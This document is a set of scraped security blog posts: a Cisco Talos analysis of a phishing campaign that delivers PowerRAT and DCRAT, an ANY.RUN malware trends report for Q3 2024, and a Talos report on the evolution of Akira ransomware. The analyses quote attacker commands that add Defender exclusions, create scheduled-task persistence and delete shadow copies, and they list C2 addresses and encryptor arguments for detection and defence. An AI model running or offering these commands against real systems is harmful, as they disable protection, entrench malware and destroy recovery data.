To identify the hidden encoded data, the macro executes a function that searches for specific strings such as “DigitalRSASignature:” and “CHECKSUM” in the content section of the Word document, and when found, it copies the data following the search strings to an array.  

To decode the base64 encoded data blob, the actor uses a custom function called CheckContent() in the macro. It removes any “=” characters which are the padding characters in the encoded data blob and decodes them into two parts in a byte array. The first part is the contents of a malicious HTML application (HTA) file and the second is a PowerShell loader.  

The macro drops the decoded contents of the malicious HTA file to “UserCache.ini.hta” and the PowerShell loader into “UserCache.ini” in the victim machine’s current user profile folder.   

The actor has abused the Windows NT current version autorun registry key called “LOAD”. The registry key “HKEY_CURRENT_USERSOFTWAREMicrosoftWindows NTCurrentVersionLOAD” is used by Windows to automatically launch applications or processes when a user logs into their account. Specifically, this key stores information about programs that are set to load upon user login. It works similarly to other startup mechanisms in Windows (such as the Startup folder or the Run registry keys), but this specific key is less commonly used. The macro after dropping the malicious HTA and the PowerShell loader script in the victim machine user profile folder, it configures the registry key “HKEY_CURRENT_USERSOFTWAREMicrosoftWindows NTCurrentVersionLOAD” with the value “C:Users<Username>UserCache.ini.hta”. 

Finally, the macro checks if there are any headers in the Word documents and deletes the contents of the headers from all sections of the Word document.  

Intermediate phase includes Malicious HTA, JavaScript, and PowerShell Loader  

The malicious HTA “UserCache.ini.hta” is executed through the LOAD registry key when a victim logs into the machine. It drops a JavaScript called “UserCacheHelper.lnk.js” in the victim machine user profile folder and writes a single line code embedding with a PowerShell command to execute the dropped PowerShell Loader masquerading as “UserCache.ini” file. The HTA file executes the JavaScript “UserCacheHelper.lnk.js” using the LOLbin “cscript.exe”. 

Sample of malicious HTA file.

The dropped JavaScript “UserCacheHelper.lnk.js” loads the contents of the “UserCache.ini” and executes it using the Invoke-Expression PowerShell command. The PowerShell Loader script masquerading as the INI file contains base64 encoded data blob of the payload PowerRAT, which decodes and executes in the victim’s machine memory.   

Sample PowerShell Loader script embedded with PowerRAT.

PowerRAT expands the attack vector for further infections  

Talos discovered a new PowerShell remote access tool as one of the payloads in this campaign we are calling PowerRAT that executes in the victim’s machine memory. It has the functionality of executing other PowerShell scripts or commands as directed by the C2 server, enabling the attack vector for further infections on the victim machine.   

The PowerRAT that executes in the victim machine memory initially checks if the JavaScript “UserCacheHelper.lnk.js” exists in the user profile folder and if not found, it will reinfect the victim machine by performing the actions of the PowerShell loader script described in the previous section. Then it hides the “UserCache.ini” by modifying the file attributes to “Hidden”. 

The PowerRAT performs reconnaissance on the victim’s machine by executing a function GetID() which collects the username, computer name, and the system driver letter through the PowerShell command Get-CimInstance. It also collects the drive serial number through the win32_volume class of WMIobject.  The collected data is written to memory in the format <Computername_Username_drive serial number>. 

After performing the reconnaissance, the PowerRAT attempts to connect to the C2 server by sending the collected data of the victim’s machine using a hardcoded URL through the HTTP GET method.  The C2 servers identified in this campaign are 94[.]103[.]85[.]47 located in Russia with the ASN 48282 of Hosting Technology LTD and 5[.]252[.]176[.]55 also geographically located in Russia with the ASN 39798 of MivoCloud SRL.  

When there is no response from the C2 server, the PowerRAT has a placeholder function called offlineworker() that has the functionality to decode an embedded base64 encoded string of a PowerShell script and executes it using the Invoke-Expression command. The actor has built this functionality to keep the infection alive in the victim machine even if the victim’s environment detects the malicious C2 traffic and blocks the connection. We didn’t see any embedded base64 encoded strings in the PowerRAT sample that we analyzed and is likely a placeholder, indicating that the actor is actively developing and updating their tools.  

The PowerRAT generates a random number between 7 – 23 and pauses its execution for (300 + random number) seconds and re-attempts to connect to the C2 server continuously waiting for a response. During our analysis, the C2 servers were not responding, and still, our further analysis of the PowerRAT showed us that the C2 server will likely respond with an XML configuration file having multiple modules with embedded base64 encoded PowerShell commands or scripts.   

The PowerRAT has the functionality to parse the received XML file and search for the sections called config.  It periodically executes the embedded encoded PowerShell commands or scripts, according to their defined intervals and run limits. The PowerRAT continues to run until all commands or scripts in the config sections are executed the required number of times.   

HTML-based infection delivers DCRAT 

Talos discovered that the threat actor is also using HTML files embedded with malicious JavaScript in this campaign that are delivered to the victims through the malicious links in the phishing email, leading to the infection of the DCRAT payload.  

When a victim clicks on the malicious link in the phishing email, a remotely located HTML file containing the malicious JavaScript opens in the victim machine’s browser and simultaneously executes the JavaScript. The JavaScript has a base64 encoded data blob of a 7-ZIP archive of a malicious SFXRAR executable. It decodes the embedded base64 encoded data blob into binary data blob with the type “application/octet-stream” in the memory. A download URL for the binary data blob is created using the URL.createObjectURL() method and assigned to a variable in memory. It calls the click() method on the URL of the binary data blob which triggers the download of the binary data to a 7-Zip archive file. The malicious 7-Zip archive masquerades as the VK messenger application archive file in one of the malicious HTML files and another with a Russian name. The actor is using this technique in the JavaScript function to masquerade as the actual download activity of a file over the internet through a browser.  

A victim must inflate the 7-Zip archive manually to run the SFXRAR executable which is masquerading as the legitimate VK application executable which leads to DCRAT infection. The SFX RAR executable is packaged with the malicious loader or dropper executables, batch file, and a decoy document in some samples.  

When a victim runs the SFX executable, the SFX script drops the packaged files into a folder and executes the batch file which runs another password-protected SFXRAR with the hardcoded password “riverdD” and runs the DCRAT.   

In another sample, we observed that the SFXRAR drops the GOLoader and the decoy document Excel spreadsheet in the victim machine user profile applications temporary folder and runs the GOLoader along with opening the decoy document.   

Talos observed an overlap of the technique used by the threat actor in this campaign with an earlier SparkRAT attack reported by Hunt researchers in April 2024, indicating that SparkRAT is another payload in the threat actor’s arsenal. 

GOLoader downloads and runs the DCRAT 

In DCRAT infection, the SFX script runs a malicious Loader executable and simultaneously opens a decoy document. The malicious loader executable we are calling “GOLoader” is compiled in Golang. It modifies the configuration settings for Microsoft Defender Antivirus, specifically by excluding the root directory “C:” and the folder “C:Users$userDesktop” in the victim machine by executing the PowerShell commands.  

powershell -Command Add-MpPreference -ExclusionPath ‘C:Users$userDesktop’

powershell -Command Add-MpPreference -ExclusionPath ‘C:’

After configuring the exclusion paths, the GOLoader downloads the DCRAT binary data stream from a remote location through a hardcoded URL and writes it into a dropped executable with the file name “file.exe” in the desktop folder on the victim’s machine. During our analysis, we found that the remote location URL hardcoded in the GOLoader was pointing to a GitHub repository, which was not accessible. However, we found that the hosted payload binary in the GitHub repository is the Dark Crystal RAT (DCRAT) binary based on open-source intelligence data.   

Threat actor delivers DCRAT 

The payload Dark Crystal RAT (DCRAT) sample that we analyzed in this campaign is a modular RAT associated with plugins to perform the DLL injection and information stealing tasks.  

Key features of the DCRAT sample of this campaign include: 

Provides remote control access to the victim machine to the actor who can execute arbitrary commands, manage files, and monitor user activities.  It has the capability of downloading and executing other files on the victim’s machine. With its stealer plugin modules, the RAT can steal sensitive information including credentials, files, and financial information from the victim’s machine.  The RAT can take screenshots and capture the keystrokes on the victim’s machine. We found that the RAT creates multiple copies of its binary masquerading as legitimate Windows executables including csrss.exe, dllhost.exe, taskhostw.exe, and winlogon.exe in the folders such as ProgramData, Pictures, Saved Games, and Windows start menu. It drops the embedded modules in the administrator user desktop folder using random file names and with the “.log” file extension.  

C:UsersadminDesktopzaHrebVC.log

C:UsersadminDesktopHQLYdHol.log

C:UsersadminDesktopqJutJUJW.log

C:UsersDefaultAppDataRoamingMicrosoftWindowsStart Menutaskhostw.exe

C:ProgramDatadllhost.exe

C:UsersDefaultPicturescsrss.exe

C:UsersDefaultSaved Gameswinlogon.exe


It establishes persistence on the victim machine by creating several Windows tasks to run at different intervals or during the Windows login process. 

Task Scheduler Commands

schtasks.exe /create /tn “winlogonw” /sc MINUTE /mo 11 /tr “‘C:UsersDefaultSaved Gameswinlogon.exe'” /f

schtasks.exe /create /tn “winlogon” /sc ONLOGON /tr “‘C:UsersDefaultSaved Gameswinlogon.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “winlogonw” /sc MINUTE /mo 5 /tr “‘C:UsersDefaultSaved Gameswinlogon.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “csrssc” /sc MINUTE /mo 12 /tr “‘C:UsersDefaultPicturescsrss.exe'” /f

schtasks.exe /create /tn “csrss” /sc ONLOGON /tr “‘C:UsersDefaultPicturescsrss.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “csrssc” /sc MINUTE /mo 7 /tr “‘C:UsersDefaultPicturescsrss.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “dllhostd” /sc MINUTE /mo 11 /tr “‘C:UsersPublicdllhost.exe'” /f

schtasks.exe /create /tn “dllhost” /sc ONLOGON /tr “‘C:UsersPublicdllhost.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “dllhostd” /sc MINUTE /mo 12 /tr “‘C:UsersPublicdllhost.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “dllhostd” /sc MINUTE /mo 8 /tr “‘C:UsersAll Usersdllhost.exe'” /f

schtasks.exe /create /tn “dllhost” /sc ONLOGON /tr “‘C:UsersAll Usersdllhost.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “dllhostd” /sc MINUTE /mo 11 /tr “‘C:UsersAll Usersdllhost.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “taskhostwt” /sc MINUTE /mo 6 /tr “‘C:UsersDefaultStart Menutaskhostw.exe'” /f

schtasks.exe /create /tn “taskhostw” /sc ONLOGON /tr “‘C:UsersDefaultStart Menutaskhostw.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “taskhostwt” /sc MINUTE /mo 10 /tr “‘C:UsersDefaultStart Menutaskhostw.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “filef” /sc MINUTE /mo 13 /tr “‘C:UsersadminAppDataLocalTempfile.exe'” /f

schtasks.exe /create /tn “file” /sc ONLOGON /tr “‘C:UsersadminAppDataLocalTempfile.exe'” /rl HIGHEST /f

schtasks.exe /create /tn “filef” /sc MINUTE /mo 9 /tr “‘C:UsersadminAppDataLocalTempfile.exe'” /rl HIGHEST /f


The RAT communicates to the C2 server through a URL hardcoded in the RAT configuration file as shown in the picture and exfiltrates the sensitive data collected from the victim machine. From other DCRAT samples identified in this campaign, we found another C2 URL “hxxp[://]cr87986[.]tw1[.]ru/L1nc0In[.]php”.  Sample of DCRAT configuration file. 

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 63963 – 63970, 63971 and 301004. 

ClamAV detections are also available for this threat: 

Win.Downloader.RustAgent-10036537-0 

Win.Downloader.RustAgent-10036538-0 

Win.Downloader.RustAgent-10036539-0 

Win.Downloader.GoAgent-10036540-0 

Win.Backdoor.PowershellRAT-10036541-0 

Win.Phishing.VbsAgent-10036542-0 

Win.Phishing.JsAgent-10036543-0 

Win.Loader.PowershellLoader-10036544-0 

Win.Loader.HtaAgent-10036545-0 

Win.Loader.DonutLoader-10036546-0

IOCs 

IOCs for this research can be found in our GitHub repository here

Cisco Talos Blog – ​Read More

Malware Trends Report: Q3, 2024

/in

We’re excited to share ANY.RUN‘s latest malware trends analysis for Q3 2024.

Our quarterly update provides insights into the most widely deployed malware families, types, and TTPs we saw during the last 3 months of the year.

Summary

Users launched over 1M sandbox sessions in Q3 2024

In Q3 2024, ANY.RUN users ran 1,090,457 public interactive analysis sessions, which is a 23.7% increase from Q2 2024. Out of these, 211,770 (19.4%) were marked as malicious, and 47,375 (4.3%) as suspicious.  

Compared to the previous quarter, the percentage of malicious sandbox sessions increased slightly from 18.4% in Q2 2024 to 19.4% in Q3 2024. The share of suspicious sessions saw a decline from 7.0% to 4.3%.  

As for indicators of compromise, users collected a total of 570,519,029 IOCs this quarter.

Collect threat intel on the latest malware and phishing campaigns with TI Lookup 



Get 20 free requests


Top Malware Types in Q3 2024   

Stealers dominated the threat landscape in Q3 2024

Let’s take a closer look at the most common malware types identified by ANY.RUN’s sandbox. 

Stealer: 16,511

Loader: 8,197 

RAT: 7,191 

Ransomware: 5,967 

Miner: 3,880 

Keylogger: 3,172 

Backdoor: 811 

Installer: 640 

Trojan: 507 

Compared to Q1 and Q2 of 2024, the ANY.RUN sandbox saw a significant increase in the detection of malware in Q3. A major reason for this is the growing number of public samples being uploaded by our 500,000-strong community of security analysts. Our team is also continuously improving the service’s capabilities, resulting in broader threat coverage. 

Top malware types: highlights  

In Q3, Stealers were the most common malware type detected, returning to the first spot since the start of the year after falling to the fourth place in Q2. They saw a serious rise in detections, reaching 16,511 in Q3.  

Loaders maintained a strong presence, securing the second position for another quarter in a row. Their detections have seen a 49% rise from 5,492 to 8,197.

After leading in Q2, RATs dropped to the third spot, with 7,191 detections. 

Trojan and Installer malware experienced a substantial decrease, shedding 3,704 and 2,466 detections correspondingly. Ransomware increased by 3,021, indicating a rise in this type of threat.  

Top Malware Families in Q3 2024   

Lumma, AsyncRAT and Remcos became top threats in Q3 2024

Lumma: 4,140 

AsyncRAT: 3,053  

Remcos: 2,548    

Agent Tesla: 2,316  

XWorm: 2,188  

Stealc: 2,030  

Snake: 1,782  

MetaStealer: 1,663  

Cobalt Strike: 1,262 

Top malware families: highlights 

In Q3 2024, the malware landscape saw notable shifts. Despite not being present on the Q2 ranking, Lumma emerged as the leading threat, recording 4,140 instances. 

AsyncRAT went from 670 detections in Q2 to 3,053 in Q3, followed by Remcos whose detections almost doubled from 1,282 to 2,548.  

Agent Tesla also showed an increase, jumping from 439 detections to 2,316, which is still more than its Q4 2023 result, when it topped the malware families chart. 

Several new families made their debut in Q3, including XWorm with 2,188 detections and Stealc with 2,030.

Learn to Track Emerging Cyber Threats

Check out expert guide to collecting intelligence on emerging threats with TI Lookup


Read full guide


Top MITRE ATT&CK techniques in Q3 2024

Disable Windows Event Logging became top TTP in Q3 2024

The MITRE ATT&CK framework categorizes adversary behavior into tactics and techniques, helping malware analysts more efficiently identify, assess, and respond to threats.

Here are the top 20 techniques observed in Q3 2024: 

#  

MITRE ATT&CK Technique    

№ of detections  

1  

Impair Defenses: Disable Windows Event Logging, T1562.002  

63,027 

2  

Command and Scripting Interpreter: PowerShell, T1059.001 

46,155 

3  

Command and Scripting Interpreter: Windows Command Shell, T1059.003 

41,384 

4  

Masquerading: Rename System Utilities, T1036.003 

41,254 

5  

Virtualization/Sandbox Evasion: Time Based Evasion, T1497.003 

39,021 

6  

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, T1547.001 

23,937  

7  

System Binary Proxy Execution: Rundll32, T1218.011  

21,896 

8  

Scheduled Task/Job: Scheduled Task, T1053.005  

16,718 

9  

Masquerading: Match Legitimate Name or Location, T1036.005 

15,594 

10  

Phishing: Spearphishing Link, T1566.002 

15,110 

11  

Credentials from Password Stores: Credentials from Web Browsers, T1555.003  

14,723 

12  

System Services: Service Execution, T1569.002 

14,257 

13  

Email Collection: Local Email Collection, T1114.001  

10,807 

14  

Create or Modify System Process: Systemd Service, T1543.002  

10,558 

15  

Scheduled Task/Job: Systemd Timers, T1053.006 

10,558 

16  

Impair Defenses: Disable or Modify Tools, T1562.001 

6,917 

17  

Command and Scripting Interpreter: Unix Shell T1059.004 

6,634 

18  

Command and Scripting Interpreter: Visual Basic T1059.005 

6,602 

19  

Software Discovery: Security Software Discovery T1518.001 

6,258 

20  

Virtualization/Sandbox Evasion: System Checks T1497.001 

6,003 

Top TTPs: Q3 2024 vs Q2 2024 

The first three spots were taken accordingly by:

T1562.002, Impair Defenses: Disable Windows Event Logging — new entry. 

T1059.001: Command and Scripting Interpreter: PowerShell — up from the 7th spot in Q2. 

T1059.003, Command and Scripting Interpreter: Windows Command Shell — rose from the 6th spot, nearly doubling in detections. 

The worthy mentions: 

T1114.001, Local Email Collection, was pushed down from the top spot in Q2 to the 13th position with 10,807 detections. 

T1036.003, Rename System Utilities, dropped from the 3d spot in the previous quarter to 4th, registering 41,254 instances. 

T1497.003, Time Based Evasion, despite falling to the 5th spot from 2nd in Q2, saw an increase in detections, bringing the figure to 39,021. 

Report methodology    

For our report, we looked at data from 1,090,457 interactive analysis sessions. This information comes from researchers in our community who contributed by running public analysis sessions in ANY.RUN.  

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Integrate ANY.RUN’s services in your organization →

The post Malware Trends Report: Q3, 2024 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Akira ransomware continues to evolve

/in

Akira continues to cement its position as one of the most prevalent ransomware operations in the threat landscape, according to Cisco Talos’ findings and analysis.

Their success is partly due to the fact that they are constantly evolving. For example, after Akira already developed a new version of their ransomware encryptor earlier in the year, we just recently observed another novel iteration of the encryptor targeting Windows and Linux hosts alike. 

Previously, Akria typically employed a double-extortion tactic in which critical data is exfiltrated prior to the compromised victim systems becoming encrypted. Beginning in early 2024, Akira appeared to be sidelining the encryption tactics, focusing on data exfiltration only. We assess with low to moderate confidence that this shift was due in part to the developers taking time to further retool their encryptor. 

During this period, we began to see Akira ransomware-as-a-service (RaaS) operators developing a Rust variant of their ESXi encryptor, iteratively building on the payload’s functions while moving away from C++ and experimenting with different programming techniques.  

Most recently, we have observed a potential shift back to previous encryption methods, in conjunction with data theft extortion tactics.  

Returning to this approach leverages the reliability of tested encryption techniques, while simultaneously capitalizing on data theft for additional leverage. Pivoting to a previously effective strategy post-language reimplementation with v2 indicates a refocus on stability and efficiency in affiliate operations. 

We anticipate Akira will continue refining its tactics, techniques, and procedures (TTPs), developing its attack chain, adapting to shifts in the threat landscape, and striving for greater effectiveness in its RaaS operations, targeting both Windows and Linux-based enterprise environments. 

Members of our team will be delving into this prickly threat actor presenting at the upcoming MITRE ATT&CKCon 5.0 in ‘GoGo Ransom Rangers: Diving into Akira’s Linux Variant with ATT&CK’. Join us as we uncover findings about the TTPs employed by this developing threat actor, dissect their attack chain, and actionable intelligence is vital in the threat protection pipeline.

“The future is not a straight line. It is filled with many crossroads” Kiyoko

2024 attack chain: Leveraging exposed network appliances and vulnerable systems for rapid compromise 

As Akira continuously refines its ransomware, affiliates are equally proactive in selecting and exploiting new vulnerabilities for initial access, adapting their tactics in tandem. They leverage newly disclosed CVEs, not only to breach networks but also to escalate privileges and move laterally within compromised environments. This allows them to establish a greater foothold to swiftly deploy encryption and exfiltrate victim data for extortion. 

Akira ransomware operators have utilized a variety of common infection vectors to gain initial access to targeted networks, often favoring the use of compromised VPN credentials. 

Most recently, Akira ransomware affiliates have been observed targeting network appliances vulnerable to CVE-2024-40766, an exploit in the SonicWall SonicOS facilitating remote code execution on the vulnerable device. Security researchers found that software on the affected systems was vulnerable to this exploit, suggesting affiliates’ swift capitalization on exposed systems. 

Additional vulnerabilities leveraged by affiliates throughout 2024 include: 

CVE-2020-3259 and CVE-2023-20263: In similar Cisco security appliance exploits leveraged in early 2024, Akira was observed abusing a flaw in Cisco Adaptive Security Appliance (ASA) with CVE-2020-3259 and CVE-2023-20263 via Firepower Threat Defense (FTD) software that allowed attackers to execute arbitrary code, after initial access was established post Cisco AnyConnect SSL VPN compromise. CVE-2023-48788: Exposed and vulnerable FortiClientEMS software abuse by Akira was observed for initial access, enabling lateral movement and privilege escalation. 

Once initial access is established, Akira operators utilize PowerShell scripts to conduct credential harvesting and privilege escalation, such as extracting Veeam backup credentials and dumping Kerberos authentication credentials. Additionally, we often see affiliates delete system shadow copies to obstruct file recovery via Windows Management Instrumentation (WMI): “Get-WmiObject Win32_Shadowcopy | Remove-WmiObject”. 

Operators typically utilize RDP connections and lateral tool transfers to move through the network and employ a variety of defense evasion techniques, such as binary padding, matching legitimate name or location taxonomy, and disabling or modifying security tools. 

In an attack targeting a Latin American airline in June 2024, RaaS operators were able to exploit key vulnerable services and deploy the ransomware payload in a manner that drastically reduced the time to exfiltrate data. Initially gaining access via Secure Shell (SSH), it was reported that the adversary obtained access to the vulnerable Veeam backup server likely via CVE-2023-27532, resulting in the access of encrypted credentials stored in the configuration database. This foothold facilitated the swift deployment of the Akira ransomware variant and exfiltration of sensitive data. 

Akira ransomware affiliates have actively exploited several additional critical vulnerabilities in 2024 after achieving initial compromise, capitalizing on unpatched vulnerabilities in widely used network appliances and software to establish persistence and move laterally:  

CVE-2023-20269: Akira affiliates were suspected of targeting this vulnerability in Cisco VPN services. The exploit leverages an unauthorized access vulnerability in the remote access VPN feature of ASA and FTD software due to a misconfiguration of improper separation of authentication, authorization, and accounting (AAA) on the device.  CVE-2024-37085: VMware ESXi vulnerability enabling unauthorized access to the hypervisor’s management interface, which can lead to full control over virtual machines once the adversary has established sufficient Active Directory Permissions. CVE-2024-40711: Akira ransomware was recently seen deployed post exploitation of the Veeam backup and replication service by triggering “Veeam.Backup.MountService.exe” to spawn “net.exe” and create local accounts for privilege escalation and persistence. 

In terms of victimology, we assess that throughout 2024, Akira has targeted a significant number of victims, with a clear preference for organizations in the manufacturing and professional, scientific, and technical services sectors, based on our analysis of Akira’s data leak site. 

A look at the previous Akira v2 ESXi encryptor 

Akira pivoted from their traditional TTPs at the end of 2023 and developed a new Linux encryptor. In March 2024, we shared findings with intelligence partners generated from a Cisco Talos Incident Response (Talos IR) engagement, which documented the newly discovered Akira_v2 and the co-occurring deployment of the adversaries’ Megazord encryptor.  

Post-encryption, we witnessed the Linux ESXi variant appended with a novel encrypted storage file extension “akiranew” dropping a ransom note in each of the directories where files were encrypted with a new nomenclature, “akiranew.txt”. We discovered two additional samples of the Akira_v2 variant (version 2024.1.30) on VirusTotal that included additional modifications to extend its command line argument capabilities, highlighting further evolution in the malware’s development. 

Arguments

Description

–path <string>

Start path. Default value: /vmfs/volumes

–id <string>

Build ID

–stopvm

Stop VMs

–vmonly

Crypt only .vmdk, .vmem, .vmx, .log, .vswp, .vmsd, .vmsn files

–threads <int>

Number of threads (1-1000). Default: number of logical CPU cores

–ep <int>

Percent of crypt. Default – 15%

–fork

Work in background

–logs <string>

Print logs. Valid values for: trace, debug, error, info, warn. Default: off

–exclude <string>

Skip files by “regular” extension. Example: –exclude=”startfilename(.*).(.*)” using this regular expression will skip all files starting with startfilename and having any extensions. Multiple regular expressions using “|” can also be processed: –exclude=”(win10-3(.*).(.*))|(win10-4(.*).(.*))|(win10-5(.*).(.*))”

-h, –help

Show help

The original Linux encryptor was written in C++, with Akira leveraging the Crypto++ library for encryption processes, whereas the v2 Rust variant makes use of rust-crypto 0.2.36 library crate for encryption processes. 

The Build ID for the v2 (version 2024.1.30) was found at offset 0x41970 for 10 bytes. 

In the v2 version targeting ESXi hosts, by default, the encryptor targets the “/vmfs/volumes/” path and will navigate into subdirectories. If this path does not exist or a path is not specified, the ransomware will fail to execute. 

Akira (The Return) to old TTPs 

From our recent analysis, we suspect that Akira may be transitioning from the use of the Rust-based Akira v2 variant and returning to previous TTPs using Windows and Linux encryptors written in C++. This could be because of a potential refocus on incremental iterations with stability and reliability in their operations over innovation. The cross-platform consistency indicates the adversaries’ focus on an adaptable payload, enabling the threat actor to target multiple operating systems with minimal changes. 

In early September 2024, we identified multiple new ransomware samples written in C++, where encrypted files are given the “.akira” extension and a ransom note named “akira_readme.txt” is dropped on the device, consistent with pre-August 2023 versions of the Akira ransomware group’s encryptor. These findings support our assessment of a tactical pivot, signaling a deliberate return to effective techniques, consistent with public reporting on the threat actors’ initial Linux variant. 

We assess with moderate confidence that the Megazord variant, previously used by the threat actor targeting Windows environments, alongside Akira v2 for Linux, has gradually faded away, further supporting a consolidation of tooling by the adversary. 

The newly observed Windows variant has been updated and appears to substitute the previously seen -remote argument for -localonly and –exclude and excludes paths, including “$Recycle.Bin” and “System Volume Information”, in the encryption process. Within the Linux variant, the –fork argument, which creates a child process for encryption, is still included along with the –exclude argument. 

Analysis of the recent binaries suggests that the threat actor has pivoted to utilizing the ChaCha8 stream cipher. The ChaCha8 algorithm is faster and more efficient than the previously leveraged ChaCha20 in Akira v_2 due to the reduced number of quarter-round operations in the cipher, possibly indicating a further focus on swift encryption and exfiltration operations such as seen in recent Akira attacks. 

New extensions targeted in recently observed Linux variants: 

.4d

.abd

.abx

.ade

.ckp

.db

.dd

dpl

.dx

.edb

.fo

.ib

.idb

.mdn

.mud

.nv

.pdb

.sq

.te

.ud

.vdh

Both newly observed encryptor variants employ exclusion paths that ignore identical Windows directories before the encryption process, a return to previous TTPs by the adversary. 

tmp

wint

temp

thumb

$Recycle.Bin

$RECYCLE.BIN

System Volume Information

Boot

Windows

Trend Micro

Future developments in Akira’s TTPs 

Future campaigns are likely to see Akira continuing to prioritize the exploitation of high-impact CVEs while reinforcing its double extortion model to increase ransom leverage.  

The exploration of the Rust programming language in recent Linux encryptors signals the threat actor’s willingness to experiment with different coding frameworks, potentially leading to more developed and resilient ransomware variants. While the return to an earlier variant indicates a potential tactical shift from this code migration, it also demonstrates that the developers remain highly adaptable, willing to reemploy tried-and-tested techniques when necessary to ensure operational stability. Pragmatic adaptability is providing significant advantages for ransomware groups operating in a dynamic threat landscape, as it allows them to maintain a robust and reliable codebase while continually seeking new ways to evade detection and enhance functionality. 

It is possible that Akira’s pivot to pure data-theft extortion at the end of 2023 and beginning of 2024 was a temporary shift during the codebase refactoring, allowing the group to maintain pressure on victims and generate revenue while developmental resources were allocated to refining the encryptor’s functionality. 

We assess that Akira and its affiliates will continue prioritizing attacks against VMWare’s ESXi and Linux environments throughout 2024, echoing a broader trend observed across the ransomware landscape. Adversary targeting of these platforms is driven by their prevalence in enterprise infrastructure, hosting critical infrastructure and high-value data, and their capacity for mass encryption and disruption with minimal lateral movement. Targeting ESXi and Linux hosts allows ransomware operators to compromise multiple virtual machines and critical workloads simultaneously, maximizing operational impact while bypassing traditional endpoint security controls. 

Virtualization is essential to large-scale deployments of cloud computing and storage resources, making ransomware attacks on ESXi hypervisors highly disruptive. Encrypting the ESXi file system provides rapid, widespread data encryption, minimizing the need for extensive lateral movement and credential theft, due to the ease of encrypting a single vmdk, rather than all the files. ESXi hypervisors often lack comprehensive security protection due to security department overhead, making them attractive targets for ransomware operators seeking fruitful targets. 

Recommendations 

Conduct regular vulnerability assessments and timely application of security patches to identify outdated software versions and unpatched vulnerabilities on ESXi hosts and implement a formal threat-informed patch management policy that includes a defined prioritization and schedule for routine updates and emergency patching of critical vulnerabilities. 

Implement strict password policies that require complex, unique passwords for each account. Additionally, enforce multi-factor authentication (MFA) to add an extra layer of security.  

Deploy a Security Information and Event Management (SIEM) system to continuously monitor and analyze security events, in addition to the deployment of EDR/XDR solutions on all clients and servers to provide advanced threat detection, investigation, and response capabilities.  

Enable secure configuration and access controls to limit access to ESXi management interfaces such as by restricting them to trusted IPs, enforcing MFA, and ensuring role-based access control (RBAC) is properly configured. 

Disable unnecessary WMI access by restricting or disabling WMI access for non-administrative users, and monitor/audit WMI commands, particularly those related to shadow copy deletion. 

Credential dumping prevention via implementing Windows Defender Credential Guard to protect Kerberos ticket data and prevent credential dumping from the Local Security Authority (LSA), ensuring to audit and apply necessary configuration changes to applications/plug-ins that aren’t compatible due to reliance on direct access to user credentials. 

Coverage 

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from theFirewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. SIDs for this threat: 

Snort3: 300924 

Snort3 Rules: 1:301007:1:0 

Snort2: 63541, 63540 

Snort2 Rules: 1:63976:1:0, 1:63977:1:0 

 

ClamAV detections are also available for this threat: 

Multios.Ransomware.Akira-10036536-0 

Multios.Ransomware.Megazord-10021030-1 

IOCs 

Windows (The Return) 

78d75669390e4177597faf9271ce3ad3a16a3652e145913dbfa9a5951972fcb0 

2c7aeac07ce7f03b74952e0e243bd52f2bfa60fadc92dd71a6a1fee2d14cdd77 

88da2b1cee373d5f11949c1ade22af0badf16591a871978a9e02f70480e547b2 

566ef5484da0a93c87dd0cb0a950a7cff4ab013175289cd5fccf9dd7ea430739 

ccda8247360a85b6c076527e438a995757b6cdf5530f38e125915d31291c00d5 

